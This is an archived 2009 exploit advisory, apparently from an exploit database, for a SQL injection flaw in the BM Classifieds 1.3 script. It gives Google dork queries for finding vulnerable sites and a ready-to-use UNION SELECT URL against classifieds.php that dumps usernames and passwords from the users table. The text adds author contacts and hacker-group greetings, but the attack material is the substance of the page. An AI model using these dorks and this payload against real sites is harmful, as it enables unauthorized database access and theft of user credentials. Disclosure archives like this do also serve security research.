BM Classifieds Ads SQL Injection Vulnerability

2009-12-04T00:00:00
ID SSV:18403
Type seebug
Reporter Root
Modified 2009-12-04T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###############################

                                                  ALGERIAN HACKER
   **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            BM Classifieds ads SQL injection vulnerability
  [!] Author    : Dr.0rYX & Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.bmscripts.com/
  [+] script   : powered by BM Classifieds
  [+] Demo : http://classifieds.bmscripts.com/
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"classifieds.php?cat="
               inurl::"showad.php?listingid="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/classifieds.php?cat=[N.A.S.T ]

  [ Exploit ]

  http://server/classifieds.php?cat=144+union+select+username,password,3,4+from+users

  [  GReet ]

  [+] :xcv-dz , CLAW , kader11000 ,le0n , exploit-db.com , ALL HACKERS MUSLIMS